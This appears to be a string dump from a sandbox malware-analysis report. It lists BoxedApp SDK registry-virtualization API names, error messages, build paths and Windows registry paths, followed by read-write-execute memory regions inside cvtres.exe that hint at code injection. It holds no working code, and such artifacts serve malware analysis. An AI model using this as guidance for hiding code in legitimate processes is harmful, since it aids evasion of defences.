=</pre><pre>BoxedAppSDK_TryCreateProcessForVirtualEXE_AnotherBitnessPartHelper</pre><pre>BoxedAppSDK_AttachMixedBitnessProcessHelper</pre><pre>BoxedAppSDK_EnumVirtualRegKeysA</pre><pre>BoxedAppSDK_EnumVirtualRegKeysW</pre><pre>BoxedAppSDK_ExecuteDotNetApplicationA</pre><pre>BoxedAppSDK_ExecuteDotNetApplicationW</pre><pre>BoxedAppSDK_DeleteVirtualRegKeyByHandle</pre><pre>BoxedAppSDK_DeleteVirtualRegKeyW</pre><pre>BoxedAppSDK_DeleteVirtualRegKeyA</pre><pre>BoxedAppSDK_CreateVirtualRegKeyW</pre><pre>BoxedAppSDK_CreateVirtualRegKeyA</pre><pre>{4F95F74C-9713-4181-ACDD-8A50195FBC0F}</pre><pre>BoxedAppSDK::CBoxedAppCore::AttachToProcess_WithProcessHelper</pre><pre>BoxedAppSDK::CBoxedAppCore::AttachMixedBitnessProcessHelper</pre><pre>CBoxedAppCore::My_NtLoadKey2, DestinationKeyName = '</pre><pre>CBoxedAppCore::My_NtRestoreKey, KeyHandle = 0x</pre><pre>CBoxedAppCore::My_NtSaveKey, KeyHandle = 0x</pre><pre>:\VirtualDllWithSameImport.dll</pre><pre>:\VirtualDllWithTls.dll</pre><pre>VirtualDllWithTls.dll</pre><pre>VirtualDllWithSameImport.dll</pre><pre>ole32.dll</pre><pre>WinExec</pre><pre>advapi32.dll</pre><pre>NtRenameKey</pre><pre>NtUnloadKey</pre><pre>NtSetValueKey</pre><pre>NtSetInformationKey</pre><pre>NtSaveKey</pre><pre>NtRestoreKey</pre><pre>NtReplaceKey</pre><pre>NtQueryValueKey</pre><pre>NtQueryMultipleValueKey</pre><pre>NtQueryKey</pre><pre>NtOpenKeyEx</pre><pre>NtOpenKey</pre><pre>NtNotifyChangeKey</pre><pre>NtLoadKey2</pre><pre>NtLoadKey</pre><pre>NtFlushKey</pre><pre>NtEnumerateValueKey</pre><pre>NtEnumerateKey</pre><pre>NtDeleteValueKey</pre><pre>NtDeleteKey</pre><pre>NtCreateKey</pre><pre>ntdll.dll</pre><pre>[BOXEDAPP][pid:%d][tid:%d][ %.2d:%.2d:%.2d.%.3d]</pre><pre>FILE_EXECUTE</pre><pre>GENERIC_EXECUTE</pre><pre>KEY_WOW64_64KEY</pre><pre>KEY_WOW64_32KEY</pre><pre>KEY_NOTIFY</pre><pre>KEY_CREATE_LINK</pre><pre>KEY_ENUMERATE_SUB_KEYS</pre><pre>KEY_CREATE_SUB_KEY</pre><pre>KEY_SET_VALUE</pre><pre>KEY_QUERY_VALUE</pre><pre>SECTION_MAP_EXECUTE</pre><pre>PAGE_EXECUTE_WRITECOPY</pre><pre>PAGE_EXECUTE_READWRITE</pre><pre>PAGE_EXECUTE_READ</pre><pre>PAGE_EXECUTE</pre><pre>STATUS_PRIMARY_TRANSPORT_CONNECT_FAILED</pre><pre>STATUS_LOCAL_USER_SESSION_KEY</pre><pre>STATUS_NULL_LM_PASSWORD</pre><pre>STATUS_IMAGE_MACHINE_TYPE_MISMATCH_EXE</pre><pre>STATUS_CARDBUS_NOT_SUPPORTED</pre><pre>STATUS_INVALID_PORT_ATTRIBUTES</pre><pre>STATUS_PORT_MESSAGE_TOO_LONG</pre><pre>STATUS_PORT_DISCONNECTED</pre><pre>STATUS_PORT_CONNECTION_REFUSED</pre><pre>STATUS_INVALID_PORT_HANDLE</pre><pre>STATUS_PORT_ALREADY_SET</pre><pre>STATUS_EAS_NOT_SUPPORTED</pre><pre>STATUS_CTL_FILE_NOT_SUPPORTED</pre><pre>STATUS_WRONG_PASSWORD</pre><pre>STATUS_ILL_FORMED_PASSWORD</pre><pre>STATUS_PASSWORD_RESTRICTION</pre><pre>STATUS_PASSWORD_EXPIRED</pre><pre>STATUS_FLOAT_DENORMAL_OPERAND</pre><pre>STATUS_FLOAT_INVALID_OPERATION</pre><pre>STATUS_PIPE_NOT_AVAILABLE</pre><pre>STATUS_INVALID_PIPE_STATE</pre><pre>STATUS_PIPE_BUSY</pre><pre>STATUS_PIPE_DISCONNECTED</pre><pre>STATUS_PIPE_CLOSING</pre><pre>STATUS_PIPE_CONNECTED</pre><pre>STATUS_PIPE_LISTENING</pre><pre>STATUS_NOT_SUPPORTED</pre><pre>STATUS_PIPE_EMPTY</pre><pre>STATUS_WRONG_PASSWORD_CORE</pre><pre>STATUS_PIPE_BROKEN</pre><pre>STATUS_DISK_OPERATION_FAILED</pre><pre>STATUS_KEY_DELETED</pre><pre>STATUS_KEY_HAS_CHILDREN</pre><pre>STATUS_NO_USER_SESSION_KEY</pre><pre>STATUS_PASSWORD_MUST_CHANGE</pre><pre>STATUS_PORT_UNREACHABLE</pre><pre>STATUS_LOGIN_TIME_RESTRICTION</pre><pre>STATUS_LOGIN_WKSTA_RESTRICTION</pre><pre>STATUS_UNSUPPORTED_COMPRESSION</pre><pre>STATUS_NO_USER_KEYS</pre><pre>STATUS_NOT_EXPORT_FORMAT</pre><pre>STATUS_TRANSPORT_FULL</pre><pre>STATUS_WMI_NOT_SUPPORTED</pre><pre>STATUS_SAM_NEED_BOOTKEY_PASSWORD</pre><pre>STATUS_SAM_NEED_BOOTKEY_FLOPPY</pre><pre>STATUS_STRONG_CRYPTO_NOT_SUPPORTED</pre><pre>STATUS_NOT_SUPPORTED_ON_SBS</pre><pre>STATUS_CSS_KEY_NOT_PRESENT</pre><pre>STATUS_CSS_KEY_NOT_ESTABLISHED</pre><pre>STATUS_NO_KERB_KEY</pre><pre>STATUS_UNSUPPORTED_PREAUTH</pre><pre>STATUS_PORT_NOT_SET</pre><pre>STATUS_INVALID_IMPORT_OF_NON_DLL</pre><pre>STATUS_SMARTCARD_NO_KEY_CONTAINER</pre><pre>STATUS_SMARTCARD_NO_CERTIFICATE</pre><pre>STATUS_SMARTCARD_NO_KEYSET</pre><pre>STATUS_SMARTCARD_CERT_REVOKED</pre><pre>STATUS_SMARTCARD_CERT_EXPIRED</pre><pre>STATUS_SXS_KEY_NOT_FOUND</pre><pre>STATUS_CLUSTER_JOIN_IN_PROGRESS</pre><pre>STATUS_CLUSTER_JOIN_NOT_IN_PROGRESS</pre><pre>RegDeleteKeyExW</pre><pre>NtRequestWaitReplyPort</pre><pre>NtConnectPort</pre><pre>NtReplyPort</pre><pre>NtCompleteConnectPort</pre><pre>NtAcceptConnectPort</pre><pre>NtReplyWaitReceivePort</pre><pre>NtCreateWaitablePort</pre><pre>Imported function,</pre><pre>.data</pre><pre>.idata</pre><pre>It's impossible to create virtual file: parent file is virtual, but passed pBehavior is not NULL</pre><pre>It's impossible to create virtual file: passed pBehavior doesn't support Behavior::IVirtualFileStream</pre><pre>It's impossible to create virtual file: parent node is virtual, but passed pBehavior is not NULL</pre><pre>BoxedAppSDK::Registry::Impl::CRegistry::GetAllChildsKeys</pre><pre>NtEnumerateKey() returned unexpected error, status =</pre><pre>, RegTree::IEnumKeyNode::GetNext() failed, hr =</pre><pre>BoxedAppSDK::Registry::Impl::CRegistry::EnumVirtualRegKeys</pre><pre>, RegTree::IKeyNode::EnumKeys() failed, hr =</pre><pre>: RegTree::IEnumKeyNode::GetNext() failed, hr =</pre><pre>: GetAllChildsKeys() failed, status =</pre><pre>BoxedAppSDK::Registry::Impl::CRegistry::NtQueryKeyInternal</pre><pre>: RegTree::IKeyNode::EnumKeys() failed, hr =</pre><pre>BoxedAppSDK::Registry::Impl::CRegistry::GetFullRegKeyPath</pre><pre>error, IVirtualKeyHandle_GetFullPath() returned</pre><pre>Invalid key information class:</pre><pre>KeySetHandleTagsInformation is not supported for virtual handle</pre><pre>KeySetDebugInformation is not supported for virtual handle</pre><pre>KeySetVirtualizationInformation is not supported for virtual handle</pre><pre>KeyControlFlagsInformation is not supported for virtual handle</pre><pre>KeyWow64FlagsInformation is not supported for virtual handle</pre><pre>We still don't process NtQueryObject / ObjectBasicInformation for virtual key handles</pre><pre>We still don't process NtQueryObject / ObjectTypeInformation for virtual key handles</pre><pre>: IVirtualKeyHandle::Rename() failed, hr =</pre><pre>: RegTree::IKeyNode::Remove() failed, hr =</pre><pre>BoxedAppSDK::Registry::Impl::CRegistry::NtRenameKeyInternal</pre><pre>: RegTree::IKeyNode::AddKey() failed, hr =</pre><pre>: result hkey =</pre><pre>: IVirtualKey::CreateKey() failed, hr =</pre><pre>: we can't create a virtual key with its own behavior under another virtual key</pre><pre>: Handles::CreateVirtualKeyHandle() failed, hr =</pre><pre>: IVirtualKey::OpenKey() failed, hr =</pre><pre>: RegImpl::CreateKeyOnSharedMem() failed, hr =</pre><pre>: GetFullRegKeyPath() failed for the hKey =</pre><pre>: Handles::IVirtualKeyHandle::CreateKey() failed and returned</pre><pre>: passed pBehavior is not NULL, but parent key is virtual, so we can't create a key</pre><pre>BoxedAppSDK::Registry::Impl::CRegistry::CreateVirtualRegKey</pre><pre>: lpSubKey: "</pre><pre>BoxedAppSDK::Registry::Impl::CRegistry::SearchStartingFromRealKey</pre><pre>: Handles::CreateVirtualKeyHandle() failed</pre><pre>BoxedAppSDK::Registry::Impl::CRegistry::NtCreateKeyInternal</pre><pre>: SearchStartingFromRealKey() failed</pre><pre>: RegTree::IKeyNode::FindValue() failed, hr =</pre><pre>BoxedAppSDK::Registry::Impl::CRegistry::NtDeleteValueKeyInternal</pre><pre>: IVirtualKeyHandle::put_Value() failed, hr =</pre><pre>BoxedAppSDK::Registry::Impl::CRegistry::GetRealKeyLastWriteTime</pre><pre>: NtQueryKey() failed, status =</pre><pre>: NtOpenKey() failed, hr =</pre><pre>BoxedAppSDK::Registry::Impl::CRegistry::HasRealKeySubKeys</pre><pre>: NtEnumerateValueKey() failed when we tried to get name of the node, status =</pre><pre>: IKeyNode::EnumValues() failed, hr =</pre><pre>: Behavior::IVirtualKeyHandle::EnumKeys() failed, hr =</pre><pre>: Behavior::IVirtualKeyHandle::EnumValues() failed, hr =</pre><pre>BoxedAppSDK::Registry::Impl::CRegistry::NtEnumerateValueKeyInternal</pre><pre>BoxedAppSDK::Registry::Impl::CRegistry::NtOpenKeyInternal</pre><pre>: invalid KeyInformationClass passed:</pre><pre>: IVirtualKeyHandle_GetFullPath() failed, hr =</pre><pre>: Behavior::IEnumVirtualKey::GetNext() failed, hr =</pre><pre>: IVirtualKeyHandle::EnumValues() failed, hr =</pre><pre>: IVirtualKeyHandle::EnumKeys() failed, hr =</pre><pre>: IVirtualKeyHandle::get_LastWriteTime() failed, hr =</pre><pre>reg:NtQueryMultipleValueKey(</pre><pre>: IKeyNode::FindValue() failed, hr =</pre><pre>: IVirtualKeyHandle::get_Value() failed, hr =</pre><pre>BoxedAppSDK::Registry::Impl::CRegistry::NtQueryValueKeyInternal</pre><pre>: IVirtualKeyHandle::get_ValueType() failed, hr =</pre><pre>reg:NtSetInformationKey(</pre><pre>RegTree::IKeyNode::RemoveValue() failed, hr</pre><pre>BoxedAppSDK::Registry::Impl::CRegistry::NtSetValueKeyInternal</pre><pre>reg:NtRenameKey(</pre><pre>RegTree::IEnumKeyNode::GetNext(), hr =</pre><pre>RegTree::IKeyNode::EnumKeys(), hr =</pre><pre>: IEnumVirtualKey::GetNext() failed, hr =</pre><pre>BoxedAppSDK::Registry::Impl::CRegistry::NtDeleteKeyInternal</pre><pre>reg:NtDeleteValueKey(</pre><pre>: NtEnumerateKey() failed when we tried to get name of the node, status =</pre><pre>, Behavior::IVirtualKeyHandle::get_Prop() failed, hr =</pre><pre>, Behavior::IVirtualKey::OpenKey() failed, hr =</pre><pre>: IKeyNode::EnumKeys() failed, hr =</pre><pre>BoxedAppSDK::Registry::Impl::CRegistry::NtEnumerateKeyInternal</pre><pre>reg:NtEnumerateValueKey(</pre><pre>reg:NtQueryKey(</pre><pre>reg:NtQueryValueKey(</pre><pre>reg:NtSetValueKey(</pre><pre>reg:NtCreateKey(</pre><pre>reg:NtDeleteKey(</pre><pre>reg:NtEnumerateKey(</pre><pre>reg:NtOpenKey(</pre><pre>GetProcessHeap</pre><pre>GetWindowsDirectoryW</pre><pre>KERNEL32.dll</pre><pre>USER32.dll</pre><pre>RegCloseKey</pre><pre>RegOpenKeyExW</pre><pre>RegDeleteKeyW</pre><pre>RegOpenKeyW</pre><pre>ADVAPI32.dll</pre><pre>OLEAUT32.dll</pre><pre>bxsdk32.dll</pre><pre>d:\build_area\boxedapp_src\src\boxedappsolution\release_full\bxsdk32.pdb</pre><pre>`.rsrc</pre><pre>v2.0.50727</pre><pre>BoxedAppSDK_AppDomainManager.dll</pre><pre>System.Security</pre><pre>.ctor</pre><pre>System.Security.Policy</pre><pre>System.Reflection</pre><pre>System.Runtime.InteropServices</pre><pre>System.Diagnostics</pre><pre>System.Runtime.CompilerServices</pre><pre>System.Collections</pre><pre>System.Security.Permissions</pre><pre>System.IO</pre><pre>DllImportAttribute</pre><pre>shell32.dll</pre><pre>lpCmdLine</pre><pre>1.0.0.0</pre><pre>$87cd9ac9-2a94-4a9b-aee1-8d25d6a19f78</pre><pre>D:\build_area\boxedapp_src\src\BoxedAppSolution\DotNetAppDomainManager\obj\x86\Release_Full\BoxedAppSDK_AppDomainManager.pdb</pre><pre>mscoree.dll</pre><pre>BoxedAppSDKThunk32.dll</pre><pre>d:\build_area\boxedapp_src\src\boxedappsolution\release_full\BoxedAppSDKThunk32.pdb</pre><pre>.reloc</pre><pre>TLSSupport32.dll</pre><pre>d:\build_area\boxedapp_src\src\boxedappsolution\release_full\TLSSupport32.pdb</pre><pre>9 9$9(9,909</pre><pre>4!40484}4</pre><pre>:$:,:5:::{:</pre><pre>?#?2?9?@?</pre><pre>1 1$1(1,1014181</pre><pre>9$=(=,=0=4=8=<=@=</pre><pre>6 6$6(6,6064686<6@6</pre><pre>1"26233'4</pre><pre>4 40454:4</pre><pre>:":2:7:>;</pre><pre>,1014181</pre><pre>8 8$8(8,8</pre><pre>%s_%.8x_%.8x_%.8x</pre><pre>\KernelBase.dll</pre><pre>\.NETFramework\assembly\GAC\BoxedAppSDK_AppDomainManager\1.0.0.0__ef07ce3257ee81c1\BoxedAppSDK_AppDomainManager.dll</pre><pre>\assembly\GAC\BoxedAppSDK_AppDomainManager\1.0.0.0__ef07ce3257ee81c1\BoxedAppSDK_AppDomainManager.dll</pre><pre>%d-%d-%p</pre><pre>:\TLSSupport310D39B571B74d36B95451DD240D8758</pre><pre>",BoxedAppSDK_TryCreateProcessForVirtualEXE_AnotherBitnessPartHelper</pre><pre>\rundll32.exe"</pre><pre>DotNetAppDomainManager.CManagedHost</pre><pre>BoxedAppSDK_AppDomainManager, Version=1.0.0.0, Culture=neutral, PublicKeyToken=ef07ce3257ee81c1</pre><pre>DotNetAppDomainManager.CAppDomainManager</pre><pre>.config</pre><pre>.manifest</pre><pre>",BoxedAppSDK_AttachMixedBitnessProcessHelper</pre><pre>Attempt to launch not executable file:</pre><pre>Unable to find appropriate template exe</pre><pre>comdlg32.dll</pre><pre>\dllhost.exe</pre><pre>hh.exe</pre><pre>find.exe</pre><pre>help.exe</pre><pre>winver.exe</pre><pre>regsvr32.exe</pre><pre>dllhost.exe</pre><pre>ntvdm.exe</pre><pre>tcpsvcs.exe</pre><pre>mpr.dll</pre><pre>Wadvapi32.dll</pre><pre>sxs.dll</pre><pre>Obtain a full version, purchase a license at http://boxedapp.com/boxedappsdk/order.html</pre><pre>%s_%.8x_%.8x</pre><pre>%s_%.8x</pre><pre>boxedapp_msg_process</pre><pre>boxedapp_event_newmsg</pre><pre>boxedapp_msg_global</pre><pre>bxsdk64.dll</pre><pre>:\{9019ACD6-BC11-4308-8C49-92E0601DF38D}\temp\</pre><pre>\DosDevices\pipe\</pre><pre>\Device\NamedPipe\</pre><pre>\??\pipe\</pre><pre>\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones</pre><pre>\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList</pre><pre>\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Print</pre><pre>\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Ports</pre><pre>\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Perflib</pre><pre>\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkCards</pre><pre>\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack</pre><pre>\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options</pre><pre>\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Gre_Initialize</pre><pre>\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes</pre><pre>\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Fonts</pre><pre>\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontMapper</pre><pre>\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontLink</pre><pre>\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontDpi</pre><pre>\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Console</pre><pre>\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Telephony\Locations</pre><pre>\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup</pre><pre>\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\PreviewHandlers</pre><pre>\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies</pre><pre>\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy</pre><pre>\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\KindMap</pre><pre>\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\DriveIcons</pre><pre>\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\AutoplayHandlers</pre><pre>\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Control Panel\Cursors\Schemes</pre><pre>\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths</pre><pre>\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates</pre><pre>\REGISTRY\MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates</pre><pre>publicKeyToken</pre><pre>Software\Microsoft\Windows\CurrentVersion\SideBySide\Winners\</pre><pre>!"#$%&'()* ,-./0123456789:;<=>?@</pre><pre>3, 3, 5, 0</pre><pre>BoxedApp, BoxedApp SDK, BoxedApp Packer, BoxedApp.com and some others are trademarks (some of them are registered) of Virtualization Technologies Ltd.</pre><pre>BoxedAppSDK.dll</pre><b>cvtres.exe_3500_rwx_10000000_00001000:</b><pre>.text</pre><pre>`.rdata</pre><pre>@.reloc</pre><b>cvtres.exe_3500_rwx_62480000_00001000:</b><pre>.text</pre><pre>0`.data</pre><pre>.rdata</pre><pre>0@.bss</pre><pre>.edata</pre><pre>0@.idata</pre><pre>.rsrc</pre><pre>.reloc</pre><b>cvtres.exe_3500_rwx_62E80000_00001000:</b><pre>.text</pre><pre>P`.data</pre><pre>.rdata</pre><pre>`@.bss</pre><pre>.edata</pre><pre>0@.idata</pre><pre>.rsrc</pre><pre>.reloc</pre></pre></pre></pre></pre></pre></pre></pre></pre></pre></pre></pre></pre></pre></-Qg></pre></The></pre></Attempt></pre></-Qg></pre></The></pre></Attempt>